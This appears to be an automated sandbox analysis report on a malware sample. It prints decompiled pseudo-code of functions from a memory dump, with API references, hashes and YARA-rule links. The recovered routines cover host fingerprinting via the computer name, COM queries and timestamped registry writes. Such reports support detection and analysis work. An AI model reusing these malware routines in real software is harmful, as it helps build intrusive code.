IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058489D8,04E968BF,?,?,?,?,?,?,?,04E968BF,00000000,00000000,00000000,006D0063), ref: 04E961A1

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: ca0ef8e97fa171589d4c1fd29b667518464db5aa41cc333b7b58278360a4c84a
Instruction ID: 67a35b0315a0ac7a7ce620c807fa0324bb092dffae87ac61a77a63866c25101b
Opcode Fuzzy Hash: ca0ef8e97fa171589d4c1fd29b667518464db5aa41cc333b7b58278360a4c84a
Instruction Fuzzy Hash: 7A516175900219EFCB00DFE9C888DEEB7B9FF88715B048659E905EB291D730AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9219B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04E9219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04E93AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4e9d2a8; // 0x9aa5a8
						_t20 = _t68 + 0x4e9e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04E957B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x04e921a1
0x04e921a4
0x04e921b4
0x04e921bd
0x04e921c1
0x04e9228f
0x04e92295
0x04e92295
0x04e921db
0x04e921e0
0x04e921e4
0x04e921ea
0x04e921ef
0x04e921f6
0x04e92205
0x04e92205
0x04e92209
0x04e9220b
0x04e92217
0x04e92222
0x04e9222d
0x04e92231
0x04e9223b
0x04e9223f
0x04e92241
0x04e92246
0x04e9224d
0x04e9225d
0x04e9225d
0x04e92246
0x04e9223f
0x04e9225f
0x04e92264
0x04e92269
0x04e92269
0x04e9226c
0x04e92275
0x04e9227a
0x04e9227a
0x04e9227f
0x04e92284
0x04e92284
0x04e9227f
0x04e92209
0x04e92286
0x04e9228c
0x00000000

APIs

Part of subcall function 04E93AB0: SysAllocString.OLEAUT32(80000002), ref: 04E93B0D
Part of subcall function 04E93AB0: SysFreeString.OLEAUT32(00000000), ref: 04E93B73

SysFreeString.OLEAUT32(?), ref: 04E9227A
SysFreeString.OLEAUT32(04E985ED), ref: 04E92284

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: bea1af2ea3798a0bc8eceea7ecdaad25a5d98140cfe43b481305ac051c6fd789
Instruction ID: 7fdc7387f78a70d0e6db81a939dfa28fec003df0a74752f84f84f19e4c7b4f63
Opcode Fuzzy Hash: bea1af2ea3798a0bc8eceea7ecdaad25a5d98140cfe43b481305ac051c6fd789
Instruction Fuzzy Hash: EC315C72500219BFCF15EFA4C888C9BBBBAFFC97447104A98F9159B250E631ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E96B75, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04E96B75(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x4e9d2a8; // 0x9aa5a8
				_t2 = _t42 + 0x4e9e470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x4e9d2a8; // 0x9aa5a8
					_t6 = _t45 + 0x4e9e490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x4e9d2a8; // 0x9aa5a8
							_t30 = _v8;
							_t12 = _t48 + 0x4e9e480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x04e96b81
0x04e96b82
0x04e96b88
0x04e96b8f
0x04e96b91
0x04e96b95
0x04e96b99
0x04e96b9b
0x04e96ba4
0x04e96baa
0x04e96bb2
0x04e96bb4
0x04e96bb8
0x04e96bba
0x04e96bc7
0x04e96bcb
0x04e96bd0
0x04e96bd6
0x04e96bdb
0x04e96be3
0x04e96be5
0x04e96be7
0x04e96bed
0x04e96bed
0x04e96bf0
0x04e96bf6
0x04e96bf6
0x04e96bf9
0x04e96bff
0x04e96bff
0x04e96c06

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04E96BB2
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04E96BE3

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: f57792ad975ebdfcdc8e597749409dc897e463fa71dce6555a8a24dfd4cd7db5
Instruction ID: bcf99b7e3b246c8341d835866cfd7921a75ca885cc5fd9f12d55b3227a13d469
Opcode Fuzzy Hash: f57792ad975ebdfcdc8e597749409dc897e463fa71dce6555a8a24dfd4cd7db5
Instruction Fuzzy Hash: 72213075900619EFCB00DFA4C844D9AB779FFC8704B148699E905DB3A4DB31ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04E93D5F, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04E93D86

Part of subcall function 04E9219B: SysFreeString.OLEAUT32(?), ref: 04E9227A

SafeArrayDestroy.OLEAUT32(?), ref: 04E93DD6

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 7eed8fd78c11b19b7bb4650c45145fef394212f39bdfab077a9fedbb28350ab2
Instruction ID: 5a51048a45254fe4ba5bfb3c53704030b1aeff7fc32c76d55596458f24aa927a
Opcode Fuzzy Hash: 7eed8fd78c11b19b7bb4650c45145fef394212f39bdfab077a9fedbb28350ab2
Instruction Fuzzy Hash: 24113075A00209BFDF01DFA9C805EEEB7B9EF08315F008015FA04E71A0E775AE158B91

Uniqueness

Uniqueness Score: -1.00%

Function 04E98E27, Relevance: 3.0, APIs: 2, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E98E27(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04E99070(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04E972C0(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E04E922F1(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x4e9d238, 0, _t25);
				}
				return _t22;
			}

0x04e98e27
0x04e98e38
0x04e98e3c
0x04e98e97
0x04e98e3e
0x04e98e45
0x04e98e4d
0x04e98e50
0x04e98e55
0x04e98e59
0x04e98e5f
0x04e98e67
0x04e98e6a
0x04e98e82
0x04e98e82
0x04e98e8d
0x04e98e8d
0x04e98e9e

APIs

Part of subcall function 04E99070: lstrlen.KERNEL32(?,00000000,05849A98,00000000,04E98808,05849C76,?,?,?,?,?,63699BC3,00000005,04E9D00C), ref: 04E99077
Part of subcall function 04E99070: mbstowcs.NTDLL ref: 04E990A0
Part of subcall function 04E99070: memset.NTDLL ref: 04E990B2

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,0584935C), ref: 04E98E5F
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,0584935C), ref: 04E98E8D

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 202c233b98b19ddd5ad690662074ec17dd515648846e87d970f248b6ea85f8b2
Instruction ID: 94bd543a5a2bb5dadbd4d4b90f577ab2838100730588c96bcf7a0776e76f4f1d
Opcode Fuzzy Hash: 202c233b98b19ddd5ad690662074ec17dd515648846e87d970f248b6ea85f8b2
Instruction Fuzzy Hash: 9F01843221020ABBEF216F95DC44E9B7BB9FF85754F100426FA049A1A0DA71ED64D750

Uniqueness

Uniqueness Score: -1.00%

Function 04E96207, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(04E9A513), ref: 04E96220

Part of subcall function 04E9219B: SysFreeString.OLEAUT32(?), ref: 04E9227A

SysFreeString.OLEAUT32(00000000), ref: 04E96261

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0f2ad5fab30c2b4b1845cfbbaca9e55009ff8f491f29219dd7524d0c00822a21
Instruction ID: ae3ed7424c5c76addd6428eb662510953f5b38a379aa57c504e83f8bf96ab80c
Opcode Fuzzy Hash: 0f2ad5fab30c2b4b1845cfbbaca9e55009ff8f491f29219dd7524d0c00822a21
Instruction Fuzzy Hash: 13014B3650020ABFDF01DFA9D804DAB7BB9EF48614B004022FA08E61A0E6309E25CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E958DB, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E04E958DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04E9A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04E9A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x04e958e0
0x04e958eb
0x04e958ed
0x04e958f3
0x04e958f5
0x04e958fa
0x04e95903
0x04e95907
0x04e95910
0x04e95914
0x04e95923
0x04e95916
0x04e95917
0x04e9591c
0x04e9591c
0x04e95914
0x04e95907
0x04e9592c

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,04E91FA0,73BCF710,00000000,?,?,04E91FA0), ref: 04E958F3

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

GetComputerNameExA.KERNELBASE(00000003,00000000,04E91FA0,04E91FA1,?,?,04E91FA0), ref: 04E95910

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 88e7e059e07bd3a6dca6f3f1ba22d80bfd07ce35f33dbde93dee844c1e27097f
Instruction ID: d2e363ac3154738a40fe7b760cf19ecac10cb68e1aecf742e39fff76c3fc3a71
Opcode Fuzzy Hash: 88e7e059e07bd3a6dca6f3f1ba22d80bfd07ce35f33dbde93dee844c1e27097f
Instruction Fuzzy Hash: 8DF05437600145BAFF12D79A9C01EAF76FDDFC5654F251069A914E3180EA70FE019770

Uniqueness

Uniqueness Score: -1.00%

Function 04E94ECA, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x4e9d23c) == 0) {
						E04E91B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x4e9d23c) == 1) {
						_t10 = E04E912E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x04e94ed1
0x04e94ed2
0x04e94ed5
0x04e94f07
0x04e94f09
0x04e94f09
0x04e94ed7
0x04e94ed8
0x04e94eed
0x04e94ef4
0x04e94ef6
0x04e94ef6
0x04e94ef4
0x04e94ed8
0x04e94f11

APIs

InterlockedIncrement.KERNEL32(04E9D23C), ref: 04E94EDF

Part of subcall function 04E912E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04E94EF2,?), ref: 04E912F8

InterlockedDecrement.KERNEL32(04E9D23C), ref: 04E94EFF

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 77c38530dac5697c517490bea1f2e129d41570d6228a878f89dae7c26a1ae587
Instruction ID: 1822dac2bf1ccebc2e6625842649509146dc4ebe8bdba00eba03178b13397ec5
Opcode Fuzzy Hash: 77c38530dac5697c517490bea1f2e129d41570d6228a878f89dae7c26a1ae587
Instruction Fuzzy Hash: 0DE04F6120C137A3FF266FB49D08B5AE7C2EB80B89F117515E881D10D4D610FC429695

Uniqueness

Uniqueness Score: -1.00%

Function 04E9161B, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E04E9161B(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x4e9d238, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x04e91620
0x04e91625
0x04e91633
0x04e91639
0x04e9163d
0x04e916ae
0x04e9163f
0x04e91643
0x04e91646
0x04e91649
0x04e91650
0x04e91651
0x04e91652
0x04e91654
0x04e91659
0x04e91660
0x04e91666
0x04e91667
0x04e91667
0x04e9166e
0x04e9166f
0x04e91670
0x04e91674
0x04e91680
0x04e91686
0x04e91687
0x04e91687
0x04e91689
0x04e9168f
0x04e91691
0x04e91696
0x04e91697
0x04e91697
0x04e9169d
0x04e916a6
0x04e916a8
0x04e916ab
0x04e916ba

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04E91633

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46345c06ca1a1c97f50911a0175511859e7bf81eceb8005cc2393ce3a61fee0c
Instruction ID: a7df4610c4d2e2ce7aec4f2c8e117df94333274af8df2a7e7089c693eddf7949
Opcode Fuzzy Hash: 46345c06ca1a1c97f50911a0175511859e7bf81eceb8005cc2393ce3a61fee0c
Instruction Fuzzy Hash: 61110631685341AFEB058F29D851BE9BBA9DF53358F18508AE4408B3D3C2779D0BC760

Uniqueness

Uniqueness Score: -1.00%

Function 04E948F1, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04E948F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x4e9d2a8; // 0x9aa5a8
				_t4 = _t15 + 0x4e9e39c; // 0x5848944
				_t20 = _t4;
				_t6 = _t15 + 0x4e9e124; // 0x650047
				_t17 = E04E9219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04E92298(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x04e948fb
0x04e94902
0x04e94903
0x04e94904
0x04e94905
0x04e9490b
0x04e94910
0x04e94910
0x04e9491a
0x04e9492c
0x04e94933
0x04e94961
0x04e94935
0x04e94937
0x04e9493c
0x04e9495e
0x04e9493e
0x04e94941
0x04e94948
0x04e9494d
0x04e9494f
0x04e9494f
0x04e94954
0x04e94954
0x04e9493c
0x04e94968

APIs

Part of subcall function 04E9219B: SysFreeString.OLEAUT32(?), ref: 04E9227A

Part of subcall function 04E92298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04E984CA,004F0053,00000000,?), ref: 04E922A1
Part of subcall function 04E92298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04E984CA,004F0053,00000000,?), ref: 04E922CB
Part of subcall function 04E92298: memset.NTDLL ref: 04E922DF

SysFreeString.OLEAUT32(00000000), ref: 04E94954

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: e1dc8e7a472d13a02e7a63cac4465b6093a529244d895bfcf1fb870fc0daa8f1
Instruction ID: e13fdc82120fbcf96a48550d0f9902218498f187fdd6cbf62e5b5e9bb4e37012
Opcode Fuzzy Hash: e1dc8e7a472d13a02e7a63cac4465b6093a529244d895bfcf1fb870fc0daa8f1
Instruction Fuzzy Hash: 93015A3250411ABFDF11EFA9CC04DAEBBF8EB44754F004569EA04A71E0E770ED168790

Uniqueness

Uniqueness Score: -1.00%

Function 04E91180, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E04E91180(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E04E9161B(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x4e9d2a8; // 0x9aa5a8
						_t9 = _t17 + 0x4e9ea38; // 0x444f4340
						_t20 = E04E91DF4( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x4e9d238, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x04e91183
0x04e91189
0x04e911e0
0x04e9118f
0x04e9119a
0x04e9119f
0x04e911a3
0x04e911b0
0x04e911b8
0x04e911c4
0x04e911cc
0x04e911d6
0x04e911d6
0x04e911a3
0x04e911e5

APIs

Part of subcall function 04E9161B: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04E91633

Part of subcall function 04E91DF4: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 04E91E28
Part of subcall function 04E91DF4: StrStrA.SHLWAPI(00000000,?), ref: 04E91E35
Part of subcall function 04E91DF4: RtlAllocateHeap.NTDLL(00000000,?), ref: 04E91E54

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,04E93C3B), ref: 04E911D6

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: eac7837d386d936a671efd0a8c5c21f47444ebb508cb7fb053f8b25e781c0328
Instruction ID: 804a4a81be3944021eff323d24009a83a567144bbab66bc9d2185338a87a2feb
Opcode Fuzzy Hash: eac7837d386d936a671efd0a8c5c21f47444ebb508cb7fb053f8b25e781c0328
Instruction Fuzzy Hash: 64016D36200105BFEF15DF86CC40EDABBF9EB44655F104125FA46861E0EB31EE44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A734, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E9A734(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x4e9d238, 0, _a4); // executed
				return _t2;
			}

0x04e9a740
0x04e9a746

APIs

RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 78ffdc865285a30c031697666d13279ea284e13b870335ff4622bdceaf63371c
Instruction ID: 138845258918febc52357e29e9adde17b3c0bf5fd88ea9e9b838962be5d99930
Opcode Fuzzy Hash: 78ffdc865285a30c031697666d13279ea284e13b870335ff4622bdceaf63371c
Instruction Fuzzy Hash: 81B01271100100BBDA115B42DE04F05FA21EB50B02F104012B308040F88B354C20FB25

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A71F, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E9A71F(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4e9d238, 0, _a4); // executed
				return _t2;
			}

